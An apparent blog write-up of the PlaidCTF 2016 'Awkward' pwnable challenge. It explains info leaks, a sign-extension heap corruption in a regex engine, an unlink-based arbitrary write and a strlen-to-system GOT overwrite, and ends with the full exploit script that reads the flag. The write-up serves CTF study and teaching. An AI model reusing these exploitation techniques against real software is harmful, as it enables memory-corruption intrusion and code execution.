<?xml version="1.0" encoding="UTF-8" standalone="yes"?><oembed><version><![CDATA[1.0]]></version><provider_name><![CDATA[dougallj]]></provider_name><provider_url><![CDATA[https://dougallj.wordpress.com]]></provider_url><author_name><![CDATA[dougallj]]></author_name><author_url><![CDATA[https://dougallj.wordpress.com/author/dougallj/]]></author_url><title><![CDATA[PlaidCTF 2016 &#8211; Awkward [Pwnable&nbsp;600]]]></title><type><![CDATA[link]]></type><html><![CDATA[<p>Awkward was an exploitation challenge, providing a pretty serious &#8220;awk&#8221; like interpreter, with a variety of different bugs.</p>
<p>I used IDA and Hex-Rays extensively to reverse it.</p>
<p>After a bit of reversing, I got it running simple programs like this:</p>
<pre class="p1"><span class="s1">START { }
</span><span class="s1">FINISH { printf "%d", 1; }
</span></pre>
<p class="p1">Mostly by a lucky guess, I then found an information leak: <strong>printf</strong> failed to check argument types, so passing a string to <strong>%x</strong> leaked its heap address:</p>
<pre class="p1"><span class="s1"> printf "%x", "string";</span></pre>
<p class="p1">The same bug, used the other way around, read a string from an arbitrary address:</p>
<pre class="p1"> printf "%s", 12345678;</pre>
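<p class="p1">A <strong>%s</strong> read stops at the first NUL byte, so reading raw memory (such as a pointer) means re-issuing the leak after each terminator. The Python 3 sketch below models that loop against a toy memory image. <strong>MEMORY</strong>, <strong>BASE</strong> and <strong>leak_cstring</strong> are made-up stand-ins for the remote process, not part of the challenge. <strong>read_at_least</strong> mirrors the helper of the same name in the full exploit at the end of this post.</p>

```python
# Toy model: MEMORY stands in for the target's address space (hypothetical data).
BASE = 0x1000
MEMORY = b"\x80\xb1\x59\xf7\x00\x00AB\x00tail\x00"

def leak_cstring(addr):
    """Model of `printf "%s", addr`: bytes up to, not including, the next NUL."""
    start = addr - BASE
    end = MEMORY.index(b"\x00", start)
    return MEMORY[start:end]

def read_at_least(addr, n):
    """Read n or more bytes by re-issuing the leak after every NUL terminator."""
    out = b""
    while n > len(out):
        # Each leak ends at a NUL, so that NUL is known and can be appended.
        out += leak_cstring(addr + len(out)) + b"\x00"
    return out

data = read_at_least(BASE, 4)
value = int.from_bytes(data[:4], "little")
print(hex(value))
```

<p class="p1">Every round trip recovers at least one byte (the terminator itself), so the loop always makes progress even across runs of zero bytes.</p>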
<p class="p1">This was all I had for probably 10 hours. I reversed most of the interpreter and the hash-map, and dug deep into some weird behaviour around string splitting, field separators and string joining. Nothing. Eventually I found another (probably unintended) information leak vulnerability, which looked like:</p>
<pre class="p1"> "string"; x = y;</pre>
<p class="p1">If <strong>y</strong> was an uninitialized variable, <strong>x</strong> would become the address of <strong>&#8220;string&#8221;</strong>.</p>
<p class="p1">Finally, and somewhat apprehensively, I embarked on reversing the last remaining component: the regex engine. There I found the corruption bug &#8211; when parsing character sets (<strong>[abc]</strong> notation), the byte values were being sign-extended before writing bits into a bitmap.</p>
<p class="p1"><img loading="lazy" data-attachment-id="412" data-permalink="https://dougallj.wordpress.com/2016/04/18/plaidctf-2016-awkward-pwnable-600/screen-shot-2016-04-18-at-10-23-37-pm/" data-orig-file="https://dougallj.files.wordpress.com/2016/04/screen-shot-2016-04-18-at-10-23-37-pm.png" data-orig-size="724,208" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Screen Shot 2016-04-18 at 10.23.37 PM" data-image-description="" data-image-caption="" data-medium-file="https://dougallj.files.wordpress.com/2016/04/screen-shot-2016-04-18-at-10-23-37-pm.png?w=300" data-large-file="https://dougallj.files.wordpress.com/2016/04/screen-shot-2016-04-18-at-10-23-37-pm.png?w=724" class="alignnone size-full wp-image-412" src="https://dougallj.files.wordpress.com/2016/04/screen-shot-2016-04-18-at-10-23-37-pm.png?w=724&#038;h=208" alt="Screen Shot 2016-04-18 at 10.23.37 PM.png" width="724" height="208" srcset="https://dougallj.files.wordpress.com/2016/04/screen-shot-2016-04-18-at-10-23-37-pm.png 724w, https://dougallj.files.wordpress.com/2016/04/screen-shot-2016-04-18-at-10-23-37-pm.png?w=150&amp;h=43 150w, https://dougallj.files.wordpress.com/2016/04/screen-shot-2016-04-18-at-10-23-37-pm.png?w=300&amp;h=86 300w" sizes="(max-width: 724px) 100vw, 724px" /></p>
<p class="p1">(v24 is an int, from a sign-extended character)</p>
<p class="p1">This allowed setting bits before the start of the bitmap using bytes <strong>80</strong> to <strong>FF</strong>, which reaches only a handful of fields. Long story short, there was a &#8220;next&#8221; pointer field, located earlier in the structure and initialised to <strong>NULL</strong>. I could write into it bit-by-bit, and as long as the character set was the last thing in the regex it would keep the new value (otherwise it would be overwritten by a real next value).</p>
<p class="p1">I took some notes on which byte values mapped to which bits, just by trying it and looking at the crash address in <strong>gdb</strong>, and eventually figured out the rules. I probably should have used a mathematical approach to calculate it, but sometimes it&#8217;s safer to just trust what you can see:</p>
<pre class="p1"> # NOTE: 0xC0 -&gt; 1
 # NOTE: 0xB9 -&gt; 2
 # NOTE: 0xBA -&gt; 4
 # NOTE: 0xBB -&gt; 8
 # NOTE: 0xBC -&gt; 10
 # NOTE: 0xBF -&gt; 80
 # NOTE: 0xC8 -&gt; 100
 # NOTE: 0xC1 -&gt; 200
 # NOTE: 0xC2 -&gt; 400
 # NOTE: 0xC7 -&gt; 8000</pre>
<p class="p1">I combined it into the following Python for setting an arbitrary address:</p>
<pre class="p1"> target = 0x12345678
 lookup = ([0xC0] + range(0xB9, 0xC0) + [0xC8] + range(0xC1, 0xC8) +
           [0xD0] + range(0xC9, 0xD0) + [0xD8] + range(0xD1, 0xD8))
 chrs = ''
 for i in range(0, 32):
     if target &amp; (1 &lt;&lt; i):
         chrs += chr(lookup[i])
 print 'print ' + str(i) + ', "hello" ~ /[' + chrs + ']/;'</pre>
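<p class="p1">For what it's worth, the table is consistent with a simple model, sketched below in Python 3. The model is an inference from the gdb notes, not something read off the decompilation: the character is sign-extended to <strong>v</strong>, the byte index is <strong>v / 8</strong> with C-style truncation toward zero, the bit number is <strong>v &amp; 7</strong>, and the &#8220;next&#8221; pointer is assumed to sit 8 bytes before the bitmap. The function names are made up for illustration.</p>

```python
def bitmap_slot(c):
    """Return (byte offset from bitmap start, bit number) for character value c."""
    v = c - 256 if c >= 0x80 else c   # sign-extend the 8-bit char
    byte_offset = int(v / 8)          # C-style division: truncates toward zero
    bit = v & 7                       # low three bits of the two's complement value
    return byte_offset, bit

POINTER_OFFSET = -8  # assumed position of the "next" field relative to the bitmap

def derive_lookup():
    """For each of the 32 pointer bits, find the byte value that sets it."""
    slots = {bitmap_slot(c): c for c in range(0x80, 0x100)}
    return [slots[(POINTER_OFFSET + i // 8, i % 8)] for i in range(32)]

def charset_for(target):
    """Byte values to place inside the character set so the pointer becomes target."""
    lookup = derive_lookup()
    return bytes(lookup[i] for i in range(32) if (target >> i) & 1)

# The table from the write-up, spelled out for comparison.
observed = ([0xC0] + list(range(0xB9, 0xC0)) + [0xC8] + list(range(0xC1, 0xC8)) +
            [0xD0] + list(range(0xC9, 0xD0)) + [0xD8] + list(range(0xD1, 0xD8)))
print(derive_lookup() == observed)
print(charset_for(0x12345678).hex())
```

<p class="p1">Truncating division paired with a two's complement mask is what produces the odd ordering: within each byte, bit 0 comes from a byte value eight higher than you would expect (<strong>0xC0</strong> rather than <strong>0xB8</strong>).</p>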
<p class="p1">I spent a few hours poking around different options for what to confuse with a &#8220;next&#8221; node before realising that if the first byte is a safe value it doesn&#8217;t crash and just frees the provided address.</p>
<p class="p1">I spent longer pondering what I should free before deciding on the &#8220;fields&#8221; array (pretty much the only array the code can access). This is an array of <strong>char*</strong> that is initialised by splitting the input line, but you can reallocate it to be a pretty arbitrary size by assigning to it. You can then write pointers to arbitrary strings into it. Pretty convenient, right?</p>
<p class="p1"><img loading="lazy" data-attachment-id="370" data-permalink="https://dougallj.wordpress.com/2016/04/18/plaidctf-2016-awkward-pwnable-600/fields-array/" data-orig-file="https://dougallj.files.wordpress.com/2016/04/fields-array.png" data-orig-size="1164,1514" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="fields-array" data-image-description="" data-image-caption="" data-medium-file="https://dougallj.files.wordpress.com/2016/04/fields-array.png?w=231" data-large-file="https://dougallj.files.wordpress.com/2016/04/fields-array.png?w=787" class="alignnone size-full wp-image-370" src="https://dougallj.files.wordpress.com/2016/04/fields-array.png?w=1164&#038;h=1514" alt="fields-array.png" width="1164" height="1514" srcset="https://dougallj.files.wordpress.com/2016/04/fields-array.png 1164w, https://dougallj.files.wordpress.com/2016/04/fields-array.png?w=115&amp;h=150 115w, https://dougallj.files.wordpress.com/2016/04/fields-array.png?w=231&amp;h=300 231w, https://dougallj.files.wordpress.com/2016/04/fields-array.png?w=768&amp;h=999 768w, https://dougallj.files.wordpress.com/2016/04/fields-array.png?w=787&amp;h=1024 787w" sizes="(max-width: 1164px) 100vw, 1164px" /></p>
<p class="p1">I found the address of the fields array by leaking some strings on either side of it in the heap and adding a constant offset:</p>
<pre class="p1"> str = "aaaabbbbccccddddeeeeffffgggghhhh";
 # duplicate the string and get its address a few times
 str; q = z;
 str; r = z;
 str; s = z;
 str; t = z;
 # reallocate fields array
 $128 = "1";
 # get one after it for reference
 str; u = z;
 # dump the addresses
 printf "%x\n%x\n%x\n%x\n%x\n", q, r, s, t, u;
 printf "%x\n%x\n%x\n%x\n", r-q, s-r, t-s, u-t;
 x = t + 112;
 printf "fields array: %x\n", x;</pre>
<p class="p1">I then rewrote my arbitrary-free to use awk to construct the regex:</p>
<pre class="p1"> code = 's = "he[";\n'
 lookup = ([0xC0] + range(0xB9, 0xC0) + [0xC8] + range(0xC1, 0xC8) +
           [0xD0] + range(0xC9, 0xD0) + [0xD8] + range(0xD1, 0xD8))
 for i in range(31, -1, -1):
     code += 'if (x &gt;= ' + str(1&lt;&lt;i) + ') { s = s "' + chr(lookup[i]) + '"; x -= ' + str(1&lt;&lt;i) + '; }\n'
 code += 's = s "]";\n'
 code += 'print "hello" ~ s;\n'</pre>
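<p class="p1">The generated awk uses only comparison and subtraction, walking the powers of two from the highest down. As a sanity check, this Python 3 sketch mimics that chain of <strong>if</strong> statements and compares it with plain bit masking. The helper names <strong>greedy_bits</strong> and <strong>mask_bits</strong> are made up for illustration.</p>

```python
def greedy_bits(x):
    """Mimic the generated awk: test powers of two from bit 31 down to bit 0."""
    chosen = []
    for i in range(31, -1, -1):
        if x >= 2 ** i:
            chosen.append(i)
            x -= 2 ** i
    return chosen, x

def mask_bits(x):
    """Reference answer: the set bits of x, highest first."""
    return [i for i in range(31, -1, -1) if (x >> i) & 1]

addr = 0x12345678
bits, remainder = greedy_bits(addr)
print(bits == mask_bits(addr), remainder)
```

<p class="p1">For any value that fits in 32 bits, the greedy walk picks exactly the set bits and leaves a remainder of zero. Going from the highest bit down is what makes this work: going upward, <strong>x &gt;= 1</strong> would be true for almost every address.</p>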
<p class="p1">So, this is enough to free the fields array, but I needed to turn it into an arbitrary write. I chose to use the linked list removal operation of the variable hashmap for this (a super awkward technique, as you&#8217;ll see).</p>
<p class="p1"><img loading="lazy" data-attachment-id="373" data-permalink="https://dougallj.wordpress.com/2016/04/18/plaidctf-2016-awkward-pwnable-600/screen-shot-2016-04-18-at-9-56-48-pm/" data-orig-file="https://dougallj.files.wordpress.com/2016/04/screen-shot-2016-04-18-at-9-56-48-pm.png" data-orig-size="1092,1528" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Screen Shot 2016-04-18 at 9.56.48 PM" data-image-description="" data-image-caption="" data-medium-file="https://dougallj.files.wordpress.com/2016/04/screen-shot-2016-04-18-at-9-56-48-pm.png?w=214" data-large-file="https://dougallj.files.wordpress.com/2016/04/screen-shot-2016-04-18-at-9-56-48-pm.png?w=732" class="alignnone size-full wp-image-373" src="https://dougallj.files.wordpress.com/2016/04/screen-shot-2016-04-18-at-9-56-48-pm.png?w=1092&#038;h=1528" alt="Screen Shot 2016-04-18 at 9.56.48 PM.png" width="1092" height="1528" srcset="https://dougallj.files.wordpress.com/2016/04/screen-shot-2016-04-18-at-9-56-48-pm.png 1092w, https://dougallj.files.wordpress.com/2016/04/screen-shot-2016-04-18-at-9-56-48-pm.png?w=107&amp;h=150 107w, https://dougallj.files.wordpress.com/2016/04/screen-shot-2016-04-18-at-9-56-48-pm.png?w=214&amp;h=300 214w, https://dougallj.files.wordpress.com/2016/04/screen-shot-2016-04-18-at-9-56-48-pm.png?w=768&amp;h=1075 768w, https://dougallj.files.wordpress.com/2016/04/screen-shot-2016-04-18-at-9-56-48-pm.png?w=732&amp;h=1024 732w" sizes="(max-width: 1092px) 100vw, 1092px" /></p>
<p class="p1">Once the fields-array was freed, I declared a new variable to reallocate the variables hashmap into the freed memory (and I declared enough variables earlier to make sure that this would cross the 70% threshold on line 61).</p>
<p class="p1">Because I could leak the address of arbitrary string data I could construct some very complex structures in memory. I used this to create a fake <strong>hashmap_entry</strong> structure, with the name pointing to a real name string. I inserted this structure in the correct slot in the hashmap by writing into the fields array, then declared a real variable with the same name, running the unlinking code in the listing above.</p>
<p class="p1">I wanted to use the code on line 38 to write to an arbitrary address, but unfortunately the &#8220;next&#8221; address had to be a valid address as well. To solve this I leaked the address of a large string in memory, and chose offsets into the string to control the low byte of the address. This allowed an arbitrary pointer to be written by repeating the &#8220;unlinking&#8221; primitive four times (increasing the write address each time).</p>
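<p class="p1">The byte-at-a-time trick can be modelled in a few lines of Python 3. This sketch only models the single store <strong>prev-&gt;next = next</strong>, with the &#8220;next&#8221; field at offset 8 as in <strong>generate_block</strong> in the full code. Any other side effects of the real unlink are ignored, and the scratch address is a made-up value.</p>

```python
NEXT_OFFSET = 8  # offset of the "next" field, as used by generate_block

def unlink_write(memory, base, prev, next_):
    """Model of `prev->next = next`: store a 32-bit pointer at prev + NEXT_OFFSET."""
    at = prev + NEXT_OFFSET - base
    memory[at:at + 4] = next_.to_bytes(4, "little")

def write_pointer(memory, base, write_to, value, scratch):
    """Write value one byte at a time using four overlapping pointer writes."""
    assert scratch % 0x100 == 0  # low byte of each stored pointer is ours to pick
    for k in range(4):
        byte = (value >> (8 * k)) & 0xFF
        # The stored pointer lands inside the big string, so it stays valid.
        unlink_write(memory, base, write_to + k - NEXT_OFFSET, scratch + byte)

GOT_SLOT = 0x08052040  # strlen's GOT slot, from the full code
SCRATCH = 0x09A00100   # hypothetical 256-byte-aligned address inside the string
got = bytearray(8)     # toy copy of the memory starting at GOT_SLOT
write_pointer(got, GOT_SLOT, GOT_SLOT, 0xF759B180, SCRATCH)
print(got.hex())
```

<p class="p1">Each write clobbers the three bytes above the one it is meant to set, and the next write repairs them. The last write spills three bytes of the scratch pointer past the target, so whatever follows the target slot is corrupted as a side effect.</p>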
<p class="p1">I used the printf leak to leak the address of <strong>strlen</strong> from the <strong>GOT</strong> then added an offset to find the address of <strong>system</strong> (since my local libc was the same), and used the unlinking technique to replace the value. <strong>strlen</strong> was used by <strong>printf</strong> when printing strings, so after corruption I could get the flag by writing:</p>
<pre class="p1"><span class="s1"> printf "%s\n", "cat flag\n"; </span></pre>
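<p class="p1">The offset arithmetic is just a fixed delta between two symbols in the same libc. A minimal Python 3 sketch, using the two constants from the full code below, follows. The function name and the example leak are made up, and this only works when the remote libc matches the local one.</p>

```python
# Addresses observed in the local libc, copied from the exploit's constants.
LOCAL_SYSTEM = 0xF759B180
LOCAL_STRLEN = 0xF75E13C0

def system_from_strlen(leaked_strlen):
    """Apply the fixed libc offset to a leaked strlen address (32-bit wraparound)."""
    return (leaked_strlen + (LOCAL_SYSTEM - LOCAL_STRLEN)) % 2 ** 32

# Hypothetical leak from a run where libc is loaded 0x1000 higher.
print(hex(system_from_strlen(LOCAL_STRLEN + 0x1000)))
```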
<h2>Full Code</h2>
<p>The full code for my exploit (in all of its hasty awkward messiness) is listed below. It has a few more tricks that hopefully don&#8217;t need too much explanation. I&#8217;m afraid I used a rather inappropriate variable name (after 20 hours of hitting my head against this problem I was a bit frustrated), and then hardcoded the hash value making it too error-prone to change after the fact. Sorry.</p>
<pre>import socket
import struct
import random
import string
import time
import sys

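ADDRESS = ('192.168.46.138', 10241)     # local test target (private address)
ADDRESS = ('awkward.pwning.xxx', 2323)  # contest server; overrides the line above
VERBOSE = True
VERBOSE = False                         # quiet during setup; switched back on before the final stage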

sock = socket.create_connection(ADDRESS)
def read_byte():
    buf = sock.recv(1)
    if not buf:
        raise EOFError
    return buf

def read_n(n):
    s = ''.join(read_byte() for i in range(n))
    if VERBOSE:
        print '&lt;', `s`
    return s

def read_until(sentinel='\n'):
    s = ''
    while not s.endswith(sentinel):
        b = read_byte()
        if VERBOSE:
            sys.stdout.write(repr(b)[1:-1])
            if b == '\n':
                sys.stdout.write('\n')
            sys.stdout.flush()
        s += b
    return s

def send(s):
    if VERBOSE:
        print '&gt;', `s`
    sock.sendall(s)

program = '''
BEGIN { }
{
    FS = "xyz";
    if ( $1 == "r" ) { printf "&gt;&gt;&gt;%s&lt;&lt;&lt;\n", 0 + $2; }
    if ( $1 == "a" ) { printf "&gt;&gt;&gt;%d&lt;&lt;&lt;\n", $2; }
    if ( $1 == "s" ) { saved0 = $2; saved1 = $3; saved2 = $4; saved3 = $5; }
    if ( $1 == "l" )
    {'''
for i in range(5):
    program += "padding%d = \"0\";" % i
program += '''
        str = "aaaabbbbccccddddeeeeffffgggghhhh";
        str; q = z;
        str; r = z;
        str; s = z;
        str; t = z;
        $128 = "1";
        str; u = z;

        print q;
        printf "%x\n%x\n%x\n%x\n%x\n", q, r, s, t, u;
        printf "%x\n%x\n%x\n%x\n", r-q, s-r, t-s, u-t;

        x = t + 112;
        #x = 305419896;
        printf "freeing %x\n", x;

        s = "he[";
'''
lookup = [0xC0] + range(0xB9, 0xC0) + [0xC8] + range(0xC1, 0xC8) + [0xD0] + range(0xC9, 0xD0) + [0xD8] + range(0xD1, 0xD8)
for i in range(31, -1, -1):
    program += 'if (x &gt;= ' + str(1 &lt;&lt; i) + ') { s = s "' + chr(lookup[i]) + '"; x -= ' + str(1 &lt;&lt; i) + '; }\n'
program += '''
        s = s "]";
        print x;
        print s;
        print "hello" ~ s;
        realloc = 1;
        $50 = saved0;
        print "alive";
        fuck = 1;
        print "alive?";

        $50 = saved1;
        print "alive";
        fuck = 1;
        print "alive?";

        $50 = saved2;
        print "alive";
        fuck = 1;
        print "alive?";

        $50 = saved3;
        print "alive";
        fuck = 1;
        print "alive?";

        printf "%s\n", "cat flag\n"; 
        print "alive??";
    }
}
FINISH { }
'''

#0xf75cb180 &lt;system
#0xf7607690 &lt;strlen

read_until('Program?')
send(program)
read_until('Ready.')


def read_address_string(a):
    send("rxyz%d\n" % (a,))
    read_until('&gt;&gt;&gt;')
    return read_until('&lt;&lt;&lt;')[:-3]

def get_address_of_string(a):
    assert ' ' not in a and '\n' not in a
    send("axyz%s\n" % (a,))
    read_until('&gt;&gt;&gt;')
    return int(read_until('&lt;&lt;&lt;')[:-3])

def read_at_least(a, n):
    r = ''
    while len(r) &lt; n:
        r += read_address_string(a + len(r)) + '\0'
    return r

def read_dword(a):
    return struct.unpack_from('I', read_at_least(a, 4))[0]

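strlen_got = 0x8052040  # address of strlen's GOT slot in the challenge binary
strlen = read_dword(strlen_got)

# system = leaked strlen + (system - strlen), using addresses from the local libc
system = strlen + (0xf759b180-0xf75e13c0)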
print hex(strlen)

junk_string = 'a' * 1024

scratch_start = get_address_of_string(junk_string)

name = get_address_of_string('fuck')
def generate_block(write_to, byte):
    target = (scratch_start + 256) &amp; ~0xFF
    next_in_chain = prev_in_chain = next_ = prev = cache = target + byte
    type_ = 0x41414141
    value = 0x41414141

    next_offset = 0x8
    prev = write_to - next_offset


    print map(hex, (next_in_chain, prev_in_chain, next_, prev, name, type_, value, cache))
    return struct.pack('IIIIIIII', next_in_chain, prev_in_chain, next_, prev, name, type_, value, cache)

def do_hash(name):
    h = 0
    for i in name:
        h = ord(i) + 1337 * h
    return h

def save(a,b,c,d):
    for s in (a,b,c,d):
        assert '\n' not in s, `s`
        assert 'xyz' not in s, `s`
        assert '\0' not in s, `s`
    send("sxyz%sxyz%sxyz%sxyz%s\n" % (a,b,c,d))

print do_hash('fuck') % 64

save(
    generate_block(strlen_got, (system &amp; 0xFF)),
    generate_block(strlen_got+1, ((system &gt;&gt; 8) &amp; 0xFF)),
    generate_block(strlen_got+2, ((system &gt;&gt; 16) &amp; 0xFF)),
    generate_block(strlen_got+3, ((system &gt;&gt; 24) &amp; 0xFF)),
    )
raw_input('attach?') # ps aux | grep ' ./awkw' | grep -v grep | cut -c10-15
send('lxyzaxyzb\n')
VERBOSE = True
read_until('xxxxx')  # sentinel never appears: echo all output until the connection closes
</pre>
<p>&nbsp;</p>
]]></html><thumbnail_url><![CDATA[https://dougallj.files.wordpress.com/2016/04/screen-shot-2016-04-18-at-10-23-37-pm.png?fit=440%2C330]]></thumbnail_url><thumbnail_width><![CDATA[439]]></thumbnail_width><thumbnail_height><![CDATA[126]]></thumbnail_height></oembed>